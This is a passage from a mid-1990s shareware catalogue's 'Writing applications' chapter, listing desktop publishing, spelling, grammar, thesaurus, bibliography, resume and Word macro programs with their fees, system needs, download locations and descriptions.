upgrade + discounts. + Look for: EVP100*.ZIP on BBSs (multiple files) (call 813-585-7082 + to download it at no charge); EVP1*.EXE on CompuServe in + CIS:PCAPP forum LIBrary 6 (multiple files) (or contact userID + 70304,64 for assistance); EVP1*.EXE on GEnie in IBMPC forum + LIBrary 0. + Download size: 500k (about 37 minutes with a 2400 baud modem) + Awards & nominations: 1994 finalist, PC Magazine/Ziff-Davis + Interactive Shareware Awards. 1993 winner, Shareware Industry + Awards. + Description: + A full-feature WYSIWYG desktop publishing program. It has a + mouse-driven Graphical User Interface and it can be used with + or without a mouse. Detailed context-sensitive help. Lets you + create publications directly on the screen, and then print them + on any printer. Provides scalable fonts that can be rotated and + filled with any fill pattern. You can import PCX images, and + draw lines, boxes, polylines, polygons, ellipses and Bezier + curves. + + Chapter 3, "Writing applications" 199 + + + + Product: FontBook Professional + Author: , 718-251-1891 + Version: 2.7 (06-13-94) + Needs: IBM 80386, Windows 3.1 or better. 4096k RAM; VGA monitor; + Hard disk; HP LaserJet printer; Mouse; XMS memory. + Strongly recommended: math coprocessor. + Registration fee: $15.00 (add $7.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of phone, fax, BBS, CompuServe, mail + support; 3-month limited return policy. Lifetime free + upgrading allowed. 1 free update disk(s) sent out. + Look for: FONTBK27.ZIP on BBSs (call 718-241-0225 to download it + at no charge); FONTBK.ZIP on CompuServe in CIS:DTP forum + LIBrary 6 (or contact userID 76670,2602 for assistance). + SWREG#: 1991 + Download size: 700k (about 52 minutes with a 2400 baud modem) + Description: + Lets you select some or all of your fonts and display them on + the screen or print speciman sheets showing different types, + styles and point sizes. Additionally, it will print and + display symbol sets for each font indicating the 4 digit ansi + code needed for display in other programs. It will also print + Type Rulers for selected fonts. A definite must for the DTP + professional. Optimized to run concurrently with other DTP + software. + + + Product: Graphcat/DOS Clip Art Cataloger + Clip art cataloger for WordPerfect 6.0/5.1. See full + description on page 224. + + Product: Graphcat/Win Clip Art Cataloger + Graphcat clip art cataloger for WPWin61/52. See full + description on page 224. + + Product: Hubble + Hubble 2.21 image + doc edit & processing. See full + description on page 494. + + Product: The Letterhead Kit/DOS + Retrieves custom letterheads, graphics, bills. See full + description on page 225. + + Product: The Letterhead Kit/Win + Retrieves custom letterheads, graphics, bills. See full + description on page 225. + + Product: MegaCad [***] + CAD program. See full description on page 501. + + Chapter 3, "Writing applications" 200 + + + + Product: MultiLabel + Author: , 805-528-1759 + Version: 3.5 (04-01-94) + Needs: IBM 80386, Windows 3.1 or better. 2000k RAM; VGA monitor; + Hard disk; Mouse; XMS memory; VBRUN300.DLL. + Registration fee: $20.00 + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); lifetime unlimited phone, fax, BBS, + CompuServe, mail support; lifetime return policy; bonus + graphics; all ASP-wide offers (see page 5); discounts on + upgrades. Lifetime free upgrading allowed. 1 free update + disk(s) sent out. + Look for: MLTLBL.ZIP on BBSs (call 805-528-3753 to download it at + no charge); MLTLBL.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 0 (or contact userID 71571,222 for assistance). + Download size: 160k (about twelve minutes with a 2400 baud modem) + Description: + This popular Windows label designer creates and prints labels + on all Avery laser label stock or create custom sizes. Name + tags, postcards, and more, too. Use all Windows fonts, BMP/PCX + clip art and line drawing tools. Serial numbers, address book, + and more. Supports all Windows printers, including color. + Rotate text. Print sheets of same labels or merge labels from + address book. Best of its class. + + + Product: QFont + Font editor for HP LaserJet soft fonts. See full description + on page 92. + + Product: Rockford! + Author: , 805-528-1759 + Version: 3.5 (05-01-94) + Needs: IBM 80386, Windows 3.1 or better. 2000k RAM; VGA monitor; + Hard disk; Mouse; VBRUN300.DLL. + Registration fee: $20.00 + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); lifetime unlimited fax, BBS, + CompuServe, mail support; lifetime return policy; bonus + graphics; all ASP-wide offers (see page 5); discounts on + upgrades. Lifetime free upgrading allowed. + Look for: ROCKFORD.ZIP on BBSs (call 805-528-3753 to download it + at no charge); RCKFRD.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 0 (or contact userID 71571,222 for assistance). + Download size: 190k (about 14 minutes with a 2400 baud modem) + Description: + Designs business cards in Windows. Use TT/ATM fonts; BMP/PCX + clip art; line drawing tools. Print on pre-scored stock from + Paper Direct and others or print 200% or 4-up camera-ready + layouts. Rotate text; insert foreign characters; right-click + help; overlay text on graphics; vertical or horizontal card + formats; color printer support; much, much more. Design + professional business cards for yourself or to earn money. + Create sheets of cards in minutes! + + Chapter 3, "Writing applications" 201 + + + + Product: Rubicon Publisher + Author: , 819-770-4317 + Version: 2.2C (06-08-91) + Needs: IBM PC, DOS 2.1 or better. Hard disk. VGA monitor + recommended. + Registration fee: $59.50 + Registration benefits: Printed manual, bonus fonts, third-party + font support, bonus features. + Look for: availability unknown on BBSs. + Download size: 337k (about 25 minutes with a 2400 baud modem) + Description: + Comprehensive desktop publisher based on traditional + typesetting concepts; over 120 features. Supports over 200 + printers including most popular 9 & 24 pin dot matrix, LaserJet + 2 & 3, & Postscript. Comes with 2 font families; supports + LaserJet 3 & Postscript fonts. Batch processor, controlled by + tags embedded in the input file. User's present word processor + or text editor can be used to prepare (Ascii) files for + publication. Screen preview provided for computers with VGA. + Great quality output! + + + Product: SmartDraw [***] + Drag & drop flowcharting & draw for Windows. See full + description on page 506. + + Product: SmartDraw 95 [***] + Drag & drop flowcharting & draw for Windows. See full + description on page 506. + + Product: Top Draw + Powerful object-oriented drawing program. See full description + on page 491. + + Product: TreeChart + Comprehensive package for organization charts. See full + description on page 308. + + + 3.6 Spelling checkers + + Product: Power Edit + Network text editor, email, file encryption. See full + description on page 377. + + Chapter 3, "Writing applications" 202 + + + + Product: Spelling Sentry + Author: , 613-825-6271 + Version: 1.3 (04-09-94) + Needs: IBM AT (80286), Windows 3.1 or better. 200k RAM; VGA + monitor; Hard disk. + Registration fee: $25.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, CompuServe, mail + support; disks of other shareware; discounts on upgrades. + Look for: availability unknown on BBSs; SPELLS.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 8 (or contact userID 72060,3056 + for assistance). + SWREG#: 1810 + PsL#: 11106 + Download size: 312k (about 23 minutes with a 2400 baud modem) + Description: + A spelling-checker application for Microsoft Windows 3.1. Can + check and correct the spelling of words in Write files, text + files, and the clipboard. Comes with a 100,000-word dictionary + and supports three types of user dictionaries. Additional + features include: American/British spelling rules selection; + Drag-and-drop file checking; readability statistics; can + automatically correct frequently misspelled words; highly + accurate suggested replacements. + + + Product: Thelma ThistleBlossom + Checks grammar, style, spell, punc & more. See full + description on page 204. + + Product: Thelma's SpellPlus + Author: , 801-223-9055 + Version: 1.1 (01-04-94) + Needs: IBM PC, DOS 3.0 or better. 256k RAM; Hard disk. + Registration fee: $9.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; 31/2" + master disk(s); 12 months of phone, newsletter, mail support; + 1-month return policy; all ASP-wide offers (see page 5); + discounts on other products. 1-month free upgrading allowed. + Look for: availability unknown on BBSs. + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + Finds spelling errors, uncapitalized names, long sentences, + padding, doubled, offensive words. More words than Sharespell. + 1000s of names and trademarks. Reads ASCII, WordPerfect, and + other files. Shows problems in context. Gives spelling + replacements. Provides both full editor and automatic + correction. Re-checks changes! Can add words to dictionary. + Fast, user-friendly. + + Chapter 3, "Writing applications" 203 + + + + Product: Word Fugue + Industrial strength word processing. See full description on + page 195. + + + 3.7 Dictionaries + + Product: Relor Rhyming Dictionary + Author: , 310-519-8049 + Version: 1.0 (10-02-94) + Needs: IBM PC, DOS 3.3 or better. + Registration fee: $20.00 + Registration benefits: 3 months of phone, mail support. + Look for: RHYME.ZIP on BBSs. + Download size: 276k (about 21 minutes with a 2400 baud modem) + Description: + This is a rhyming dictionary program. Type in a word and the + program lists the words that rhyme. It is usefull for song + writers, poets, copywriters, or anyone who uses rhyme words. + The DOS version also contains a text editor. + + + Product: Visual Computer Dictionary Plus + Graphically portrays computer definitions. See full + description on page 465. + + + 3.8 Thesaurus + + Product: BESTHES + Author: + Version: 1.5 (08-01-94) + Needs: IBM PC, DOS 3.2 or better. 47k RAM. + Registration fee: $20.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited fax, CompuServe, mail + support; 3-month return policy; bonus utilities; discounts on + upgrades. + Look for: BESTH150.ZIP on BBSs (call 718-837-3236 to download it + at no charge); BESTH1.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 2 (or contact userID 100274,655 for assistance); + BESTH150.ZIP on GEnie in IBMPC forum LIBrary 0. + SWREG#: 2647 + PsL#: 11511 + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + Equipped with a basic vocabulary of 16,250 entries x 185 (avg.) + related words per entry. Two available vocabulary-enrichment + modules extend to 28,635 entries x 210 w. per entry (6,013,350 + words). Loadable in high memory. Compatible with most word + processors in text mode, DOS 6 DoubleSpace and QEMM v7.04. May + + Chapter 3, "Writing applications" 204 + + + + be used as an integral part of your word processor as well as a + standalone application. + + + 3.9 Style checkers + + Product: BUDDY: A Tutorial Companion + Eight-lesson AI tutorial for clearer writing. See full + description on page 212. + + Product: Cliche Finder + Author: + Version: 2.0 (05-10-95) + Needs: IBM PC, DOS 2.11 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. + Registration fee: $0.00 + Registration benefits: + Look for: CLICH20.ZIP on BBSs; CLICHE.ZIP on CompuServe in + CIS:PCVENK forum LIBrary 9 (or contact userID 74774,403 for + assistance). + Download size: 141k (about eleven minutes with a 2400 baud modem) + Description: + Checks for the presence of cliches and overused phrases. Cliche + list can be edited by user. Generates a report. + + + Product: PC-Proof + Author: , 206-226-0429 + Version: 2.0A (10-18-93) + Needs: IBM PC, DOS 3.1 or better. Hard disk. Mouse recommended. + Registration fee: $40.00 + Registration benefits: Printed manual, master disks, phone + support. + Look for: availability unknown on BBSs; PC-PRO.ZIP on CompuServe + in CIS:PCAPP forum LIBrary 2 (or contact userID 72630,3457 for + assistance). + Download size: 360k (about 27 minutes with a 2400 baud modem) + Awards & nominations: 1993 finalist, Shareware Industry Awards. + Description: + A commerial quality grammar checking program that can detect + many complex and embarrassing grammar errors. These errors + include dropped words, extra words or words which may have been + misspelled into another word. Can also detect many many other + mistakes including subject/verb agreement, and passive voice. + Compatible with WordPerfect, Word, Works, WinWord, ProWrite, + PC-Write, WordStar and others. Full mouse support. + + Chapter 3, "Writing applications" 205 + + + + Product: Thelma ThistleBlossom + Author: , 801-223-9055 + Version: 5.20 (12-26-93) + Needs: IBM PC, DOS 3.1 or better. 256k RAM; Hard disk. + Registration fee: $29.00 (add $5.00 for shipping to U.S. + addresses) (add $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); 12 months of phone, + newsletter, mail support; 2-month return policy; all ASP-wide + offers (see page 5). 1-month free upgrading allowed. + Look for: availability unknown on BBSs; THISTLEB.ZIP on GEnie in + WORDPERFEC forum LIBrary 6 (or contact userID WP.TED for + assistance). + Download size: 800k (about 60 minutes with a 2400 baud modem) + Awards & nominations: 1993 finalist, Shareware Industry Awards. + Description: + Combines grammar, punctuation, spelling, cliche, and usage + checking in a single pass. When it finds a problem, it displays + the sentence in context, highlights the problem, explains what + is wrong, and gives you a suggestion. Often you can implement + the suggestion with a single keystroke. You may also use a + built-in editor to change the text. Automatically rechecks any + sentence that you change. Easy, powerful, fast, and thorough. + Creates strong, readable business letters. + + + Product: Thelma's ClichePlus + Author: , 801-223-9055 + Version: 1.8 (01-04-94) + Needs: IBM PC, DOS 3.0 or better. 256k RAM; Hard disk. + Registration fee: $9.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; 31/2" + master disk(s); 12 months of unlimited phone, newsletter, mail + support; 1-month return policy; all ASP-wide offers (see + page 5); discounts on other products. 1-month free upgrading + allowed. + Look for: availability unknown on BBSs. + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + Finds cliches, idioms, long sentences, short sentences, too + many or too few spaces at the end of a sentence. Differs from + ClicheFinder: + 1. thousands more entries; + 2. more sophisticated pattern matching; + 3. shows problems in context; + 4. provides full editor; + 5. re-checks changes. + Reads ASCII, WordPerfect, and other file formats. + + Chapter 3, "Writing applications" 206 + + + + Product: Thelma's SpellPlus + Spell, capitalizes, proper nouns, full editor. See full + description on page 202. + + Product: WinProof + Author: , 206-226-0429 + Version: 1.0C (01-28-94) + Needs: IBM AT (80286), Windows 3.1 or better. + Registration fee: $45.00 + Registration benefits: Printed manual, master disks, phone + support. + Look for: availability unknown on BBSs; WINPRO.EXE on CompuServe + in CIS:PCAPP forum LIBrary 2 (or contact userID 72630,3457 for + assistance). + Download size: 360k (about 27 minutes with a 2400 baud modem) + Description: + A professional grammar checker for Windows that can detect many + complex and embarrassing errors like dropped words, extra words + or words that have been misspelled into another word. Can also + detect may other mistakes including subject/verb agreement, + misused articles and passive voice. Not another feeble style or + readability checker. It knows English! Compatible with all + major word processors and can check the clipboard. + + + Product: WStyle + Author: , 613-825-6271 + Version: 1.13 (07-25-93) + Needs: IBM PC, DOS 3.0 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk; Epson printer. + Registration fee: $25.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of + unlimited phone, CompuServe, mail support; all ASP-wide offers + (see page 5). + Look for: availability unknown on BBSs. + Download size: 150k (about eleven minutes with a 2400 baud modem) + Description: + Helps improve your writing style in two ways. First, it + examines your writing for common problems, such as redundant + words, wordy phrases, and awkward sentence structure. Second, + it analyzes your writing style and presents statistics that + tell you where your writing is weak and where it is strong. + Although it is not a substitute for an independent review, it + can help you to write more clearly and directly and avoid + common writing-style errors. + + Chapter 3, "Writing applications" 207 + + + + 3.10 Bibliography + + See also: Education. + + Product: BIBLOGIC + Author: + Version: 3.02 (12-19-93) + Needs: IBM PC, DOS 2.1 or better. 640k RAM. + Strongly recommended: Hard disk. + Registration fee: $47.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited fax, CompuServe, mail support; all ASP-wide + offers (see page 5). + Look for: availability unknown on BBSs; BIBLOG.ZIP on CompuServe + in CIS:EDFORUM forum LIBrary 2 (or contact userID 75020,556 for + assistance). + Download size: 400k (about 30 minutes with a 2400 baud modem) + Description: + A research and writing tool to store, retrieve, and print + bibliographic information and associated remarks. Handles many + different reference styles and organizes notes as well as + references. Works with most word-processors. + + + Product: REFILE + Document management software. See full description on + page 461. + + Product: RMS-III: Ref.Mgn.Sys. + Author: , 201-670-9856 + Version: 3.2b (03-20-94) + Needs: IBM PC, DOS 3.0 or better. 510k RAM. + Strongly recommended: Hard disk. + Registration fee: $55.00 (add $10.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of phone, fax, CompuServe, mail + support; 1-month return policy; bonus utilities; all ASP-wide + offers (see page 5). 3-month free upgrading allowed. + Look for: RMS32B.ZIP on BBSs; RMS32B.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 7 (or contact userID 74267,2713 for + assistance). + Download size: 603k (about 45 minutes with a 2400 baud modem) + Description: + Annotated menu based system for handling biblio/reference + material for research, writing, collecting. Many options for + view, search, retrive, report, lists, import/export, duplicate + checks, and data statistics. Has 21 fields including authors, + title, source, year, keywords, special codes, etc. and free- + text abstract/notes. Output to printer or generic wordprocessor + files with many list and card formats plus user definable + styles to fit publication requirements. dBase III(r) data + files. + + Chapter 3, "Writing applications" 208 + + + + 3.11 Document boilerplates + + 3.11.1 Resume' + + Product: Resume Master Deluxe + Author: + Version: 4.0 (02-01-94) + Needs: IBM PC, DOS 3.1 or better. 512k RAM; Hard disk. + Registration fee: $20.00 + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited CompuServe, mail + support; discounts on upgrades. + Look for: availability unknown on BBSs; RMD40.ZIP on CompuServe + in CIS:PCAPP forum LIBrary 7 (or contact userID 71742,3632 for + assistance). + SWREG#: 1938 + PsL#: 11143 + Download size: 380k (about 28 minutes with a 2400 baud modem) + Description: + A powerful resume generating tool that will give you the + winning edge needed in today's job market. Easy-to-use & menu + driven. Prompts you to enter information about yourself, past + work history, education, etc. This information is then + formatted & printed to create a professional-looking customized + one-page resume. Creates choice of chronological or targeted + resume. Supports any printer. Online help system & on-disk + user's manual. Print resume to file for customization. + + + Product: The Right Resume + Author: + Version: 1.0c (05-01-95) + Needs: IBM 80386, Windows 3.1 or better. 4096k RAM; VGA monitor; + Hard disk; Mouse. + Registration fee: $25.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); lifetime unlimited CompuServe, mail + support; bonus utilities; bonus data; all ASP-wide offers (see + page 5); discounts on upgrades. + Look for: availability unknown on BBSs; TRR_1C.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 20 (or contact userID 71742,3632 + for assistance). + SWREG#: 4388 + PsL#: 11756 + Download size: 1131k (about 84 minutes with a 2400 baud modem) + Description: + Powerful Windows-based job hunting package. Features include: + Create choice of chronological, functional, or targeted resume; + Fully-functional WYSIWYG word processer for creating cover + letters, customizing your resume, etc.; Generate multiple + resumes from one data source without having to retype; Modify + + Chapter 3, "Writing applications" 209 + + + + feature to easily reorganize or delete data; On-disk user's + manual and on-line help system. + + + 3.12 Document control & management + + Product: Infothek (Docuthek) + Author: , 610.640.0339 + Version: 1.10 (08-10-95) + Needs: IBM PC, Windows 3.0 or better. VBRUN300.DLL. + Registration fee: $59.00 (add $3.50 for shipping to U.S. + addresses) (add $3.50 for shipping to Canadian addresses) (add + $3.50 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, CompuServe support; 3-month return + policy; all ASP-wide offers (see page 5); discounts on other + products; discounts on upgrades. 12-month free upgrading + allowed. + Look for: availability unknown on BBSs; DOCUTK.ZIP on CompuServe + in CIS:WINPROD forum LIBrary 2 (or contact userID 76534,1166 + for assistance). + SWREG#: 6520 + Download size: 830k (about 62 minutes with a 2400 baud modem) + Description: + Comprehensive document imaging system for business and personal + use. Industry-standard formats and compression. TIFF, DCX, + GIF, JPEG, WMF, and many other formats. Multiple pages. + Popular relational database engine. Easy-to-use, intuitive, + yet powerful SQL-based query method. Scan documents with fax + machine or scanner. + + + Product: LPRINT + Formats & prints files for PS w/ borders, etc. See full + description on page 93. + + Product: MegaWord + More than 30 add-in apps for WinWord 6.0. See full description + on page 219. + + Product: Power Edit + Network text editor, email, file encryption. See full + description on page 377. + + Product: REFILE + Document management software. See full description on + page 461. + + Product: WhizNotes + A text organizer & help generator for Windows. See full + description on page 192. + + Chapter 3, "Writing applications" 210 + + + + 3.13 Creativity & brainstorming + + See also: Business, Training & support aids, Lecturing & slide + shows. + + Product: CODE-A-LINE + Outline processor, text editor, printing util. See full + description on page 192. + + Product: Creativity Package + Author: + Version: 4.0a (07-29-95) + Needs: IBM PC, DOS 2.11 or better. 512k RAM; Dual 720k floppy + drives. + Strongly recommended: Hard disk. + Registration fee: $34.00 (add $3.00 for shipping to Canadian + addresses) (add $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of fax, CompuServe, mail support; + discounts on other products; discounts on upgrades. + Look for: CREAT40A.ZIP on BBSs; CREATE.ZIP on CompuServe in + CIS:PCVENK forum LIBrary 9 (or contact userID 74774,403 for + assistance). + PsL#: 10195 + Download size: 460k (about 34 minutes with a 2400 baud modem) + Description: + 3-part program for writers, teachers, students, executives - + anyone who must produce fresh ideas. Includes a complete book- + on-disk on creativity enhancement, software for computer-aided + brainstorming, and a poetry writing program. + + + Product: Curses! + Creative insult generator. See full description on page 608. + + Product: Grammar Expert + Online reference for English grammar. See full description on + page 213. + + Product: OMNIDay For Windows + Author: , 816-429-3558 + Version: 2.70 (02-28-95) + Needs: IBM PC, DOS 3.1 or better. 330k RAM; CGA monitor; + Hercules monitor. + Strongly recommended: Dual 720k floppy drives; Hard disk; HP + LaserJet printer; Mouse. + Registration fee: $29.95 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); lifetime unlimited phone, + fax, BBS, CompuServe, mail support; all ASP-wide offers (see + page 5); disks of other shareware; discounts on other products. + + Chapter 3, "Writing applications" 211 + + + + Lifetime free upgrading allowed. 99 free update disk(s) sent + out. + Look for: ODAYW270.ZIP on BBSs (call 317-784-2147 to download it + at no charge); ODAY4W.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 7 (or contact userID 70272,3317 for assistance). + SWREG#: 1715 + Download size: 334k (about 25 minutes with a 2400 baud modem) + Description: + A benchmark system for electronic diary programs! Allows up to + 10 users, each with their own passcode. Optional encryption of + the opus (up to 10,000 possibilities). The user names the opus + and enters their own name as author. Automatic entry of text + date line, entry can be up to 99 pages of 2K each. User can + update and delete entries. Will print out opus for selected + dates or all. Full featured text editor with on line help. + Import feature for those who travel. Includes diary keeping + tips. + + + Product: On This Day + "What happened on this day in history?" See full description + on page 474. + + Product: On This Day for Windows + "What happened on this day in history?" See full description + on page 475. + + Product: PoeTrio + Three poetry tutorials with separate editors. See full + description on page 454. + + Product: Poetry Generator + Author: + Version: 2.4a (01-28-94) + Needs: IBM PC, DOS 2.11 or better. 512k RAM; Dual 720k floppy + drives. + Strongly recommended: Hard disk. + Registration fee: $29.00 (add $3.00 for shipping to Canadian + addresses) (add $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited fax, CompuServe, mail + support; discounts on upgrades. + Look for: POET24A.ZIP on BBSs; POETRY.ZIP on CompuServe in + CIS:PCVENK forum LIBrary 9 (or contact userID 74774,403 for + assistance). + Download size: 515k (about 38 minutes with a 2400 baud modem) + Description: + Turn your computer into a poet! Using a 20,000-word vocabulary, + this program creates free-verse poems at the touch of a button. + Using the structure of actual poems as models, the program + randomly combines words and short phrases into verses 4 to 9 + lines long. The results as fascinating. Some of these poems + have actually been published in national magazines. This + + Chapter 3, "Writing applications" 212 + + + + program has been featured in the Los Angeles Times, Scientific + American, and Writer's Digest. + + + Product: POETRY STAR + An AI poetry tutor that chats & cracks jokes. See full + description on page 457. + + Product: WhizNotes + A text organizer & help generator for Windows. See full + description on page 192. + + + 3.14 Writing utilities + + Product: Bookbild/DOS Pamphlet Publisher + Converts doc. file to camera-ready booklet. See full + description on page 223. + + Product: Bookbild/Win Pamphlet Publisher + Builds single-fold brochures in WPWIN 5.2. See full + description on page 223. + + Product: BOXER/DOS Text Editor + Full-featured text editor/word processor. See full description + on page 185. + + Product: BOXER/OS2 Text Editor + Full-featured text editor/word processor. See full description + on page 185. + + Product: BUDDY: A Tutorial Companion + Author: , 216-632-5447 + Version: 1.2 (08-05-92) + Needs: IBM PC, DOS 2.11 or better. 240k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Dual 720k floppy drives. + Registration fee: $19.50 + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); lifetime unlimited + tollfree 800# phone, fax, CompuServe, GEnie, newsletter, mail + support; 1-month return policy; all ASP-wide offers (see + page 5); discounts on other products; discounts on upgrades. + Look for: CSBDY.ZIP on BBSs; CSBDY.ZIP on CompuServe in + CIS:IBMAPPS forum LIBrary 0 (or contact userID 71031,1036 for + assistance); CSBDY.ZIP on GEnie in IBMPC forum LIBrary 0. + Download size: 132k (about ten minutes with a 2400 baud modem) + Description: + Are you already pretty good with your word processor? Now in + just eight lessons you can (a) write more effectively and (b) + avoid some embarrassing mistakes. Also lets you enjoy wacky + banter with your PC - as "comic relief" to the very serious + business of clear and strategic writing. Written in the AI + + Chapter 3, "Writing applications" 213 + + + + language INRAC, which means that you can conduct typed + conversations with the program in standard English. Contains a + special "common error detector." + + + Product: Cliche Finder + Checks writing cliches. See full description on page 204. + + Product: Grammar Expert + Author: , 613-825-6271 + Version: 1.02 (02-15-93) + Needs: IBM AT (80286), Windows 3.1 or better. 100k RAM; VGA + monitor; Hard disk. + Strongly recommended: Mouse. + Registration fee: $25.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, CompuServe, mail + support; bonus data; all ASP-wide offers (see page 5); disks of + other shareware. 1 free update disk(s) sent out. + Look for: availability unknown on BBSs; GE102.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 8 (or contact userID 72060,3056 + for assistance). + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + An online, hypertext reference book for the rules of English + grammar, punctuation, and effective writing. Contains practical + answers, guidelines, and advice on thousands of grammar-related + points for business, writers, students, and people learning + English as a second language. Use its online index and table of + contents to locate the information you need quickly. Explains + the grammatical rules involved and provides plenty of examples. + + + Product: Lecture + Displays text-based slide show lectures. See full description + on page 330. + + Product: The Letterhead Kit/DOS + Retrieves custom letterheads, graphics, bills. See full + description on page 225. + + Product: The Letterhead Kit/Win + Retrieves custom letterheads, graphics, bills. See full + description on page 225. + + Product: PC-Proof + A commercial quality grammar checker. See full description on + page 204. + + Product: Simply Docs + Converts ASCII files to EXEs. TSR/print opts. See full + description on page 57. + + Chapter 3, "Writing applications" 214 + + + + Product: Thelma ThistleBlossom + Checks grammar, style, spell, punc & more. See full + description on page 204. + + Product: WinProof + Windows grammar checker. See full description on page 206. + + 3.14.1 File format translators + + See also: Utilities, File utilities, File sorting & conversion. + + Product: MEGA EDIT Editor for Windows + Text editor for large files. See full description on page 187. + + + 3.15 Software tools & macros + + 3.15.1 For multiple programs + + Product: Fonts Ink Fonts + Specialized TrueType and PostScript fonts. See full + description on page 76. + + Product: Over_LAZ HP + Author: , 519-366-2732 + Version: 4 (01-01-94) + Needs: IBM PC, DOS 2.0 or better. CGA monitor; Hard disk; HP + LaserJet printer. WordPerfect 5.x, 6, WordStar, Word, AMI Pro + or PC-Write. HP LaserJet II/III/4 printer. + Strongly recommended: Word processing program, spread sheet, + data base. + Registration fee: $25.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); 3 months of phone, + CompuServe, mail support; bonus templates. 3-month free + upgrading allowed. + Look for: availability unknown on BBSs; OVER4.ZIP on CompuServe + in CIS:PCAPP forum LIBrary 2 (or contact userID 72060,1153 for + assistance). + Download size: 1400k (about 104 minutes with a 2400 baud modem) + Description: + A collection of over 150 printer overlay files for WordPerfect + 4.2 or later, Word, Word for Windows, AmiPro WordStar, PC- + Write, dBase, and other applications and an HP LaserJet + compatible printer. Over_LAZ are provided for standard office + forms (inter office memo, FAX transmittal, etc) as well as + 'rubber stamps' (draft, confidential, etc) and decorative page + borders. Over_LAZ are automatically printed on the page over + your document. Extra fonts are not required. 512k printer RAM + is sufficient. + + Chapter 3, "Writing applications" 215 + + + + Product: Safe Program + Lock files in a software safe - Email secure. See full + description on page 38. + + 3.15.2 For PC-Write + + Product: Over_LAZ HP + HP LaserJet overlays and letterheads. See full description on + page 214. + + Product: PC-Proof + A commercial quality grammar checker. See full description on + page 204. + + Product: WinProof + Windows grammar checker. See full description on page 206. + + 3.15.3 For Word + + Product: Over_LAZ HP + HP LaserJet overlays and letterheads. See full description on + page 214. + + Product: PC-Proof + A commercial quality grammar checker. See full description on + page 204. + + 3.15.3.1 Word for Windows + + Product: AMF'S WINFAX PRO 4.0 MACRO + Author: + Version: 1 (09-06-94) + Needs: IBM AT (80286), Windows 3.1 or better. Word for Windows + 6.0. + Registration fee: $10.00 + Registration benefits: Full program functionality; 6 months of + unlimited CompuServe, mail support; all ASP-wide offers (see + page 5). 1-month free upgrading allowed. + Look for: WFX40.ZIP on BBSs; WFX40.ZIP on CompuServe in + CIS:MSWORD forum LIBrary 4 (or contact userID 74250,1700 for + assistance). + SWREG#: 2618 + Download size: 65k (about five minutes with a 2400 baud modem) + Description: + The only fax macro in the business which takes advantage of + virtually every feature of WinFax Pro 4.0 from inside Word 6.0. + Choose cover pages, resolution, type on cover page, specify + recipient, do background faxing, and so much more. + + Chapter 3, "Writing applications" 216 + + + + Product: Business Cards for Word 6.0 + Author: + Version: 2.0 (05-02-95) + Needs: IBM AT (80286), Windows 3.1 or better. Word for Windows + 6.0. + Registration fee: $5.00 + Registration benefits: Full program functionality; printed + manual; 6 months of unlimited mail support; source code; bonus + data; all ASP-wide offers (see page 5). + Look for: AFCRD.ZIP on BBSs; AFCRD.ZIP on CompuServe in + 